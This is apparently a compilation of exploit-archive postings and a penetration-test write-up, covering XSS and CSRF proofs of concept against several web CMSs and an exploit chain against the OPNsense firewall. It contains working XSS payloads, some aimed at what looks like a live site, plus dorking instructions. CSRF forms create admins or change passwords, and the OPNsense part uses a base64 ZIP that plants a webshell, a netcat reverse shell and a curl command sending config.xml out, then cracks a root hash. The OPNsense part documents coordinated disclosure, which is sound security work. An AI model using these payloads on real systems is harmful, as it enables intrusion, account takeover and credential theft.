DriverPack Solution CMS version 17.11.108 suffers from a cross site scripting vulnerability.

**DriverPack Solution CMS 17.11.108 Cross Site Scripting**

Posted Aug 10, 2023

Authored by indoushka

DriverPack Solution CMS version 17.11.108 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | e6bbd0f2f85c5a85db0341ad4fa0a655765bd7b91a5cc41a6d0b07469ab56025

Download | Favorite | View

**DriverPack Solution CMS 17.11.108 Cross Site Scripting**

    ====================================================================================================================================| # Title     : DriverPack Solution CMS v 17.11.108 Xss Vulnerability                                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : https://driverpack.io/                                                                                             |  | # Dork      : n/a                                                                                                                |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] Use xss payload : _%3C/script%3E%3Cscript%3Eprompt(/indoushka/)%3C/script%3E&password=zeb[+] http://target_site/en?email=_%3C/script%3E%3Cscript%3Eprompt(/indoushka/)%3C/script%3E&password=zebGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,928)
*   Arbitrary (16,193)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,275)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,344)
*   DoS (23,416)
*   Encryption (2,370)
*   Exploit (51,848)
*   File Inclusion (4,221)
*   File Upload (973)
*   Firewall (821)
*   Info Disclosure (2,768)
*   Intrusion Detection (892)
*   Java (3,043)
*   JavaScript (858)
*   Kernel (6,670)
*   Local (14,447)
*   Magazine (586)
*   Overflow (12,690)
*   Perl (1,423)
*   PHP (5,144)
*   Proof of Concept (2,338)
*   Protocol (3,601)
*   Python (1,535)
*   Remote (30,759)
*   Root (3,580)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,639)
*   Security Tool (7,886)
*   Shell (3,180)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,364)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (664)
*   Vulnerability (31,767)
*   Web (9,662)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,930)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,810)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,423)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,711)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,805)
*   UNIX (9,289)
*   UnixWare (186)
*   Windows (6,572)
*   Other

DriverPack Solution CMS 17.11.108 Cross Site Scripting

Desenvolvido C3iM CMS version 2.0 suffers from a cross site scripting vulnerability.

**Desenvolvido C3iM CMS 2.0 Cross Site Scripting**

Posted Aug 10, 2023

Authored by indoushka

Desenvolvido C3iM CMS version 2.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | ee75f970e155669b73118332fbaa7e9c33f33900005bfc151805b9ba771cd102

Download | Favorite | View

**Desenvolvido C3iM CMS 2.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : Desenvolvido C3iM CMS v2.0 XSS Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            | | # Vendor    : http://c3im.pt/                                                                                                    |  | # Dork      : intext:''Desenvolvido C3iM'' site:pt                                                                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : <marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] http://127.0.0.1/conteudo.php?id=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,928)
*   Arbitrary (16,193)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,275)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,344)
*   DoS (23,416)
*   Encryption (2,370)
*   Exploit (51,848)
*   File Inclusion (4,221)
*   File Upload (973)
*   Firewall (821)
*   Info Disclosure (2,768)
*   Intrusion Detection (892)
*   Java (3,043)
*   JavaScript (858)
*   Kernel (6,670)
*   Local (14,447)
*   Magazine (586)
*   Overflow (12,690)
*   Perl (1,423)
*   PHP (5,144)
*   Proof of Concept (2,338)
*   Protocol (3,601)
*   Python (1,535)
*   Remote (30,759)
*   Root (3,580)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,639)
*   Security Tool (7,886)
*   Shell (3,180)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,364)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (664)
*   Vulnerability (31,767)
*   Web (9,662)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,930)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,810)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,423)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,711)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,805)
*   UNIX (9,289)
*   UnixWare (186)
*   Windows (6,572)
*   Other

Desenvolvido C3iM CMS 2.0 Cross Site Scripting

Deprixa version 3.2.5 suffers from a cross site request forgery vulnerability.

====================================================================================================================================  
| # Title     : Deprixa 3.2.5 CSRF Vulnerability                                                                                   |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit)                                              |   
| # Vendor    : https://themes-dl.com/nulled-courier-deprixa-pro-integrated-web-system-v3-2-5-free-download/                       |    
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code create a new admin .

[+] Go to the line 11.

[+] Set the target site link Save changes and apply . 

[+] infected file : /dashboard/settings/addusersadmin/agregar.php.

   
          <div class="modal fade" id="nuevo" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">  
            <div class="modal-dialog">  
            <div class="modal-content">  
              <div class="modal-header">  
              <button type="button" class="close" data-dismiss="modal"><span aria-hidden="true">&times;</span><span class="sr-only">Close</span></button>  
              <h4 class="modal-title" id="myModalLabel"><i class="fa fa-user-plus"></i>New Administrator</h4>  
              </div>  
              <div class="modal-body">  
                
                <form action="https://127.0.0.1/deprixalogisticsonline/dashboard/settings/addusersadmin/agregar.php"  data-parsley-validate novalidate method="post" class="form-horizontal" enctype="multipart/form-data">  
                  <div class="form-group " id="gnombrepa">  
                  <label for="off_name" class="col-sm-2 control-label"></label>  
                  <div class="col-sm-10">  
                    <input type="text" class="form-control off_name" parsley-trigger="change" required name="name_parson"  placeholder="Administrator Name">  
                  </div>  
                  </div>  
                  <div class="form-group" id="gapellido">  
                  <label for="email" class="col-sm-2 control-label">Email</label>  
                  <div class="col-sm-5">  
                    <input type="text" class="form-control email" name="email"  id="id_mail" placeholder="demo@demo.com" required onKeyUp="javascript:validateMail('id_mail')">  
                    <strong><span id="emailOK"></span></strong>  
                  <p class="error"></p>  
                  </div>  
                  <div class="col-sm-5">  
                    <input class="form-control phone" name="phone" parsley-trigger="change" required placeholder="Phone">                                        
                  </div>  
                  </div>  
                  <div class="form-group" id="gemail">  
                  <label for="office" class="col-sm-2 control-label">Office</label>  
                  <div class="col-sm-5">  
                    <input type="text" class="form-control office" parsley-trigger="change" required name="office"  placeholder="Name of the Office">  
                  </div>  
                  <div class="col-sm-5">  
                  <select type="text" class="form-control role" name="role" >  
                    <option value="Administrator">Administrator</option>                        
                  </select>  
                  </div>  
                  </div>  
                  <div class="form-group " id="gnombre">  
                  <label for="off_name" class="col-sm-2 control-label">User</label>  
                  <div class="col-sm-10">  
                    <input type="text" class="form-control off_name" parsley-trigger="change" required name="name"  placeholder="Username">  
                  </div>  
                  </div>  
                  <div class="form-group" id="gpassword">  
                  <label for="pwd" class="col-sm-2 control-label">Password</label>  
                  <div class="col-sm-10">  
                    <input type="text" class="form-control pwd" parsley-trigger="change" required name="pwd"  placeholder="Password">  
                  </div>  
                  </div>  
                  </br></br>  
                  <div class="col-sm-offset-2 col-sm-10">  
                    <div class="checkbox">  
                      <label class="i-checks i-checks-sm">  
                      <input type="checkbox" name="estado" value="1" onclick="return false" checked >  
                      <i></i>  
                      State                      </label>  
                    </div>  
                    <div class="checkbox">  
                      <label class="i-checks i-checks-sm">  
                      <input type="checkbox" name="type" value="a" onclick="return false" checked >  
                      <i></i>  
                      User Type                      </label>  
                    </div>  
                  </div>

                                      
                </div>  
                 </br></br>  
                <div class="modal-footer">  
                  <button type="button" class="btn btn-default" data-dismiss="modal"><i class="fa fa-times"></i>  
                    Close</button>  
                  <input class="btn btn-success" name="Submit" type="submit"  id="submit" value="Save">  
                </div>  
              </form>                                
            </div>  
            </div>  
          </div>

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |  
=======================================================================================================================================

Deprixa 3.2.5 Cross Site Request Forgery

A CSRF issue was discovered in LWsystems Benno MailArchiv 2.10.1.

August 9, 2023

The Benno MailArchiv Web-App (benno-web prior 2.1.0.2) is vulnerable to Cross-Site-Request-Forgery.

To exploit the vulnerability the attacker sends a link to a prepared page to a Benno MailArchiv user. The link then is able to trigger actions in the name of the user such as changing the users password (if the user is logged in).

<form action="https://benno.host/admin.php?CA=changePassword" method="post">
<input type="text" name="CA" value="savePassword">
<input type="password" class="input\_text" name="data\[password0\]" value="test123">
<input type="password" class="input\_text" name="data\[password1\]" value="test123">
<input type="password" class="input\_text" name="data\[addresses\]" value='\[{"value":"\*@\*"}\]'>

</form>

<script>
  document.forms\[0\].submit();
</script>

CVE-2023-38348: XSRF in Benno MailArchiv Web-App (benno-web < 2.10.2) (CVE-2023-38348)

A command injection vulnerability in the component /api/cron/settings/setJob/ of OPNsense before 23.7 allows attackers to execute arbitrary system commands.

Recently we performed a non-profit penetration test of OPNsense - an open source, FreeBSD based firewall and routing platform with ~51.47K active instances according to censys.io. The assessment was focused on web GUI and API as well as some parts of the system backend. Work has been carried out in a period from June 12 to June 26, 2023. In total, around 120 hours were committed to the project.

During the test we managed to find many interesting and varied vulnerabilities, e.g., Cross-Site Scripting, Cross-Site Request Forgery, Open Redirect, Insecure Permissions, OS Command Injection and Zip-Slip which eventually leads to root shell. You can find all of them in the Full PDF Report which is also a great example of what our commercial clients receive.

We would like to show you three scenarios of how vulnerabilities that we found could be chained together to perform attacks on the OPNsense instance.

**Scenario 1 - Reflected XSS leads to root RCE via Zip-Slip**

In this scenario we used Reflected Cross-Site Scripting vulnerability (LT-0017) to deliver our payload to the administrator. Sending GET request to https://opnsense/ui/cron/item/open/0'+alert(window.origin)+' would result in the following response:

    <!doctype html>
    <html lang="en-US" class="no-js">
      <head>
    [...]
    <script>
    [...]
    	openDialog('0'+alert(window.origin)+'');
    [...]

After an administrator clicks on our link, we need to send six requests from their browser. First two requests create new Captive Portal template, another three enable Captive Portal with the selected template, and the last one spawns netcat reverse shell with our brand-new luta.php webshell.

**Example Javascript payload:**

    let requestData = {"name":"zipslip","content":"UEsDBAoAAAAAAJOO5VYdoS5KEAAAABAAAAA3ABwALi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vdXNyL2xvY2FsL3d3dy9sdXRhLnBocFVUCQADxZGlZPyPpWR1eAsAAQQAAAAABAAAAAA8Pz1gJF9HRVRbeF1gPz4KUEsDBAoAAAAAAEGO5VYAAAAAAAAAAAAAAAAEABwAY3NzL1VUCQADKpGlZCuRpWR1eAsAAQToAwAABOgDAABQSwMEFAAAAAgAMn7lVqx0FrPKAAAAvQEAAAwAHABleGNsdWRlLmxpc3RVVAkAA/B0pWSLkaVkdXgLAAEE6AMAAAToAwAAjY8xbsMwDEV3nYJAhk5RgN6gd+gFZJeSmVKiQdJRffvKKbpk8sjPx/8/L/C5kAGTOczSPFEz8AUhE2NLFY8pOdS0QxOHCUEeqF3JHRtM+xPeDBX6MoRZMTm1AvNmLhUc68rJ0WK4wAcz0FAMqI27/9wu7e3pPC4Uv/6WeNTJVOJP5SNGNoWso1AX/Q6z2W0ScXNNaxxTrGl9USu1YxPyeMtuhfd1oeFp1yVx5tHRropl46QRxc9g9ihnMPd8BuuST3Pv4f762t3CL1BLAwQKAAAAAABEjuVWAAAAAAAAAAAAAAAABgAcAGZvbnRzL1VUCQADL5GlZDCRpWR1eAsAAQToAwAABOgDAABQSwMECgAAAAAASo7lVgAAAAAAAAAAAAAAAAcAHABpbWFnZXMvVVQJAAM8kaVkQZGlZHV4CwABBOgDAAAE6AMAAFBLAwQKAAAAAABTjuVW5yL1pwQAAAAEAAAACgAcAGluZGV4Lmh0bWxVVAkAA06RpWSLkaVkdXgLAAEE6AMAAAToAwAAcG9jClBLAwQKAAAAAABPjuVWAAAAAAAAAAAAAAAAAwAcAGpzL1VUCQADRZGlZEaRpWR1eAsAAQToAwAABOgDAABQSwECHgMKAAAAAACTjuVWHaEuShAAAAAQAAAANwAYAAAAAAABAAAApIEAAAAALi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vdXNyL2xvY2FsL3d3dy9sdXRhLnBocFVUBQADxZGlZHV4CwABBAAAAAAEAAAAAFBLAQIeAwoAAAAAAEGO5VYAAAAAAAAAAAAAAAAEABgAAAAAAAAAEADtQYEAAABjc3MvVVQFAAMqkaVkdXgLAAEE6AMAAAToAwAAUEsBAh4DFAAAAAgAMn7lVqx0FrPKAAAAvQEAAAwAGAAAAAAAAQAAAICBvwAAAGV4Y2x1ZGUubGlzdFVUBQAD8HSlZHV4CwABBOgDAAAE6AMAAFBLAQIeAwoAAAAAAESO5VYAAAAAAAAAAAAAAAAGABgAAAAAAAAAEADtQc8BAABmb250cy9VVAUAAy+RpWR1eAsAAQToAwAABOgDAABQSwECHgMKAAAAAABKjuVWAAAAAAAAAAAAAAAABwAYAAAAAAAAABAA7UEPAgAAaW1hZ2VzL1VUBQADPJGlZHV4CwABBOgDAAAE6AMAAFBLAQIeAwoAAAAAAFOO5VbnIvWnBAAAAAQAAAAKABgAAAAAAAEAAACAgVACAABpbmRleC5odG1sVVQFAANOkaVkdXgLAAEE6AMAAAToAwAAUEsBAh4DCgAAAAAAT47lVgAAAAAAAAAAAAAAAAMAGAAAAAAAAAAQAO1BmAIAAGpzL1VUBQADRZGlZHV4CwABBOgDAAAE6AMAAFBLBQYAAAAABwAHAEsCAADVAgAAAAA="}
    ajaxCall("/api/captiveportal/service/saveTemplate", requestData, () => {
    	ajaxCall("/api/captiveportal/service/reconfigure", {}, () => {
    		ajaxCall("/api/captiveportal/service/searchTemplates", {"current":1,"rowCount":7,"sort":{},"searchPhrase":"zipslip"}, (data, status) => {
    			let requestData = {"zone":{"enabled":"1","interfaces":"lan","authservers":"Local Database","alwaysSendAccountingReqs":"0","authEnforceGroup":"","idletimeout":"0","hardtimeout":"0","concurrentlogins":"1","certificate":"","servername":"","allowedAddresses":"","allowedMACAddresses":"","transparentHTTPProxy":"0","transparentHTTPSProxy":"0","extendedPreAuthData":"0","template":data.rows[0].uuid,"description":"poc"}}
    			ajaxCall("/api/captiveportal/settings/addZone/", requestData, () => {
    				ajaxCall("/api/captiveportal/service/reconfigure", {}, () => {
    					ajaxCall("/luta.php?x=rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>%261|nc 192.168.1.118 1337 >/tmp/f", null, null)
    				})
    			})
    		})
    	})
    })

Above script can be base64 encoded and put inside the URL:

    https://opnsense/ui/cron/item/open/0'+eval(atob('bGV0IHJlcXVlc3REYXRhID0geyJuYW1[...]gkJCQl9KQoJCQl9KQoJCX0pCgl9KQp9KQo='))+'

What’s interesting is that the application accepts templates in ZIP format, and then it extracts all of their contents to the template directory. However, the way in which the application extracts the files makes it vulnerable to the Zip-Slip attack (LT-0014):

    # source: src/opnsense/scripts/OPNsense/CaptivePortal/overlay_template.py
    with zipfile.ZipFile(input_data, mode='r', compression=zipfile.ZIP_DEFLATED) as zf_in:
        for zf_info in zf_in.infolist():
            if zf_info.filename[-1] != '/':
                target_filename = '%s%s' % (target_directory, zf_info.filename)
                file_target_directory = '/'.join(target_filename.split('/')[:-1])
                if not os.path.isdir(file_target_directory):
                    os.makedirs(file_target_directory)
                with open(target_filename, 'wb') as f_out:
                    f_out.write(zf_in.read(zf_info.filename))
                os.chmod(target_filename, 0o444)

By using ../ sequences it is possible to extract files to other directories. This allows us to extract PHP file to the web root - /usr/local/www.

Our ZIP archive looks like this, where luta.php is a simple PHP web shell:

    Archive:  zipslip.zip
      Length      Date    Time    Name
    ---------  ---------- -----   ----
           16  2023-07-05 17:52   ../../../../../../../../../../../usr/local/www/luta.php
            0  2023-07-05 17:50   css/
          445  2023-07-05 15:49   exclude.list
            0  2023-07-05 17:50   fonts/
            0  2023-07-05 17:50   images/
            4  2023-07-05 17:50   index.html
            0  2023-07-05 17:50   js/
    ---------                     -------
          465                     7 files

Since the PHP process is being ran as a root user, the shell is granted root privileges as well.

**Proof of Concept Video:****Scenario 2 - Reflected XSS -> OS Command Injection -> root password retrieval via config.xml insecure permissions**

In the second scenario the payload is also delivered through Reflected XSS, but this time the vulnerability is introduced in Certificates tab (LT-0002). Sending request to https://opnsense/system_certmanager.php?act=%22%3E%3Csvg/onload=alert(window.origin)%3E&id=0 results in the following response body:

    <!doctype html>
    <html lang="en-US" class="no-js">
    [...]
    <form method="post" name="iform" id="iform"><input type="hidden" name="N3p4b1ZZUXpTc2VFWmFaLzRHQW5Ydz09" value="VUlyWVI0bWkyYkdjWDNvVGprQ1F2UT09" autocomplete="new-password" />
      <input type="hidden" name="id" id="id" value="0"/>
      <input type="hidden" name="act" id="action" value=""><svg/onload=alert(window.origin)>"/>
    </form>
    [...]

We want to send request to /api/cron/settings/addJob/ in order to add new cron job. The application allows only specific commands to be executed via cron, however, by including single quotes (') and newline character (\n) in the command parameters, we can define completely separate cron job and execute any command as nobody user (LT-0016).

**Example Javascript payload:**

    let requestData = {"job":{"enabled":"1","minutes":"*","hours":"*","days":"*","months":"*","weekdays":"*","command":"firmware auto-update","parameters":"'\n*\t*\t*\t*\t* curl -F config=@/conf/config.xml 192.168.1.118:1337 #'","description":"poc2"}}
    setTimeout(() => {
    	ajaxCall("/api/cron/settings/addJob/", requestData, () => {
    		ajaxCall("/api/cron/service/reconfigure", {}, () => {
    		})
    	})
    }, 1000)

…and turned into an URL:

    https://opnsense/system_certmanager.php?act=%22%3E%3Csvg/onload=eval(atob(%27bGV0IHJlcXVlc3REYXRh[...]HsKCQl9KQoJfSkKfSwgMTAwMCk=%27))%3E&id=0

After the administrator opens the link, we can see our command added to the crontab:

    root@OPNsense:~ # cat /var/cron/tabs/nobody
    # DO NOT EDIT THIS FILE -- OPNsense auto-generated file
    #
    # User-defined crontab files can be loaded via /etc/cron.d
    # or /usr/local/etc/cron.d and follow the same format as
    # /etc/crontab, see the crontab(5) manual page.
    SHELL=/bin/sh
    PATH=/etc:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
    #minute	hour	mday	month	wday	command
    # Origin/Description: cron/poc2
    *	*	*	*	*	/usr/local/sbin/configctl -d firmware auto-update '
    *	*	*	*	* curl -F config=@/conf/config.xml 192.168.1.118:1337 #'

In the above payload we are adding next vulnerability to the chain - even though we only have privileges of user nobody, insecure permissions (LT-0003) grant us read access to the configuration file:

    root@OPNsense:/conf # ls -la
    total 112
    drwxr-xr-x   4 root  wheel    512 Jul 31 12:41 .
    drwxr-xr-x  21 root  wheel   1024 Jul 31 12:44 ..
    drwxr-xr-x   2 root  wheel   4096 Jul 31 14:13 backup
    -rw-r-----   1 root  wheel  49152 Jul 31 12:41 captiveportal.sqlite
    -rw-r--r--   1 root  wheel  39796 Jul 31 14:13 config.xml
    -rw-r-----   1 root  wheel    383 Jul 31 12:41 dhcpleases.tgz
    -rw-r-----   1 root  wheel     40 Jul 31 14:13 event_config_changed.json
    drwxr-xr-x   2 root  wheel    512 Jul  5 12:40 sshd

Soon config.xml is sent to our listener:

    feliks@debian ~> nc -lkp 1337
    POST / HTTP/1.1
    Host: 192.168.1.118:1337
    User-Agent: curl/7.87.0
    Accept: */*
    Content-Length: 39119
    Content-Type: multipart/form-data; boundary=------------------------06c60d07c2a2ae1e
    
    --------------------------06c60d07c2a2ae1e
    Content-Disposition: form-data; name="config"; filename="config.xml"
    Content-Type: application/xml
    
    <?xml version="1.0"?>
    <opnsense>
      <theme>opnsense</theme>
      <sysctl>
    [...]
        <user>
          <name>root</name>
          <descr>System Administrator</descr>
          <scope>system</scope>
          <groupname>admins</groupname>
          <password>$2y$10$YRVoF4SgskIsrXOvOQjGieB9XqHPRra9R7d80B3BZdbY/j21TwBfS</password>
          <uid>0</uid>
        </user>
    [...]

Congratulations, it’s a bcrypt hash of a root password!

Finally, we feed it to hashcat:

    feliks@debian ~> hashcat -m 3200 '$2y$10$YRVoF4SgskIsrXOvOQjGieB9XqHPRra9R7d80B3BZdbY/j21TwBfS' -a 0 wordlist.txt
    hashcat (v6.1.1) starting...
    
    [...]
    
    $2y$10$YRVoF4SgskIsrXOvOQjGieB9XqHPRra9R7d80B3BZdbY/j21TwBfS:opnsense
                                                     
    Session..........: hashcat
    Status...........: Cracked
    Hash.Name........: bcrypt $2*$, Blowfish (Unix)
    Hash.Target......: $2y$10$YRVoF4SgskIsrXOvOQjGieB9XqHPRra9R7d80B3BZdbY...1TwBfS
    Time.Started.....: Mon Jul 31 17:04:47 2023 (0 secs)
    Time.Estimated...: Mon Jul 31 17:04:47 2023 (0 secs)
    Guess.Base.......: File (wordlist.txt)
    Guess.Queue......: 1/1 (100.00%)
    Speed.#1.........:       10 H/s (3.82ms) @ Accel:2 Loops:64 Thr:1 Vec:8
    Recovered........: 1/1 (100.00%) Digests
    Progress.........: 6/6 (100.00%)
    Rejected.........: 0/6 (0.00%)
    Restore.Point....: 0/6 (0.00%)
    Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:960-1024
    Candidates.#1....: luta -> opnsense
    
    Started: Mon Jul 31 17:04:13 2023
    Stopped: Mon Jul 31 17:04:48 2023

**Scenario 3 - CSRF that halts the firewall**

This one is quite straightforward. Administrator visits our website, from which we redirect them to https://opnsense/api/core/system/halt, to turn off the instance. Normally, this request is made using POST method and requires CSRF token, but during the test it turned out that the app accepts GET request as well, and in such case doesn’t require CSRF token.

As a result, the OPNsense instance turns off.

**Proof of Concept Video:****Closing thoughts**

We reported found vulnerabilities to OPNsense maintainers and we really want to thank them for a great response. They handled the whole process very professionally, quickly prepared effective patches for many vulnerabilities and included them in the newest release - OPNsense 23.7 “Restless Roadrunner”. Also, they provided us with reasoning behind decision to not patch some of them right now.

We are very happy about the outcome of the tests and can’t wait to start another project like this soon. Stay tuned!

**Full list of found vulnerabilities**

1.  LT-0001: Using GET method to modify application state
2.  LT-0002: Reflected Cross-Site Scripting - Certificates - act
3.  LT-0003: Insecure directory permissions - /conf/
4.  LT-0004: Reflected Cross-Site Scripting - Log Files - /ui/diagnostics/log/core/
5.  LT-0005: Open Redirect - Login
6.  LT-0006: Services run as root
7.  LT-0007: Insecure temporary file storage - /tmp/ usage
8.  LT-0008: Command injection - Backups - diag\_backup.php
9.  LT-0009: Custom message injection - system\_usermanager.php
10.  LT-0010: Improper error handling
11.  LT-0011: Lack of input sanitization - crash\_reporter.php
12.  LT-0013: Insecure permissions - configd.socket
13.  LT-0014: Zip-slip in Captive Portal template upload leads to Remote Code Execution
14.  LT-0015: Verbose error messages
15.  LT-0016: Command injection - Cron - /api/cron/settings/setJob/
16.  LT-0017: Reflected Cross-Site Scripting - Cron - /ui/cron/item/open/

**Timeline**

*   27.06.2023 Vulnerabilities reported to OPNsense
*   27.06.2023 Report acknowledged
*   28.06 - 05.07.2023 Vendor fixed the vulnerabilities
*   12.07 Retest
*   17.07.2023 End of vulnerabilities disclosure process - reported issues are fixed or otherwise handled
*   31.07.2023 OPNsense 23.7 Released

CVE-2023-39008: LogicalTrust - [EN] A-Z: OPNsense - Penetration Test

PHPJabbers Vacation Rental Script version 4.0 suffers from a cross site request forgery vulnerability.

    # Exploit Title: PHPJabbers Vacation Rental Script 4.0 - CSRF# Date: 05/08/2023# Exploit Author: Hasan Ali YILDIR# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/vacation-rental-script/# Version: 4.0# Tested on: Windows 10 Pro## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsTechnical Detail / POC==========================1. Login Account2. Go to Property Page (https://website/index.php?controller=pjAdminListings&action=pjActionUpdate)3. Edit Any Property (https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=21)[1] Cross-Site Request ForgeryRequest:https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=21&tab="<script><font%20color="red">CSRF%20test</font>[2] Cross-Site Scripting (XSS)Request:https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=21&tab="<script><image/src/onerror=prompt(8)>

PHPJabbers Vacation Rental Script 4.0 Cross Site Request Forgery

eHato CMS version 1.0 suffers from a cross site scripting vulnerability.

**eHato CMS 1.0 Cross Site Scripting**

Posted Aug 9, 2023

Authored by indoushka

eHato CMS version 1.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 288795acae37e9889703f9a9e13f4dc91e382a11ff20d9b6c617e50c574fefb2

Download | Favorite | View

**eHato CMS 1.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : eHato CMS 1.0 XSS Vulnerability                                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://www.ehato.com                                                                                              |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /news/news.asp?keyword=%25C3%25F6%25C1%25E4%25A6r%25B7j%25B4M'%22()%26%25<acx><ScRiPt%20>prompt(996317)</ScRiPt>&kind_id=&Page=2[+] http://wtatcs.orgtw/news/news.asp?keyword=%25C3%25F6%25C1%25E4%25A6r%25B7j%25B4M'%22()%26%25<acx><ScRiPt%20>prompt(996317)</ScRiPt>&kind_id=&Page=2Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,924)
*   Arbitrary (16,191)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,275)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,343)
*   DoS (23,415)
*   Encryption (2,369)
*   Exploit (51,833)
*   File Inclusion (4,221)
*   File Upload (973)
*   Firewall (821)
*   Info Disclosure (2,766)
*   Intrusion Detection (892)
*   Java (3,043)
*   JavaScript (858)
*   Kernel (6,666)
*   Local (14,447)
*   Magazine (586)
*   Overflow (12,690)
*   Perl (1,423)
*   PHP (5,142)
*   Proof of Concept (2,338)
*   Protocol (3,601)
*   Python (1,535)
*   Remote (30,753)
*   Root (3,579)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,639)
*   Security Tool (7,883)
*   Shell (3,180)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,361)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (664)
*   Vulnerability (31,765)
*   Web (9,661)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,926)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,810)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,418)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,709)
*   Slackware (941)
*   Solaris (1,610)
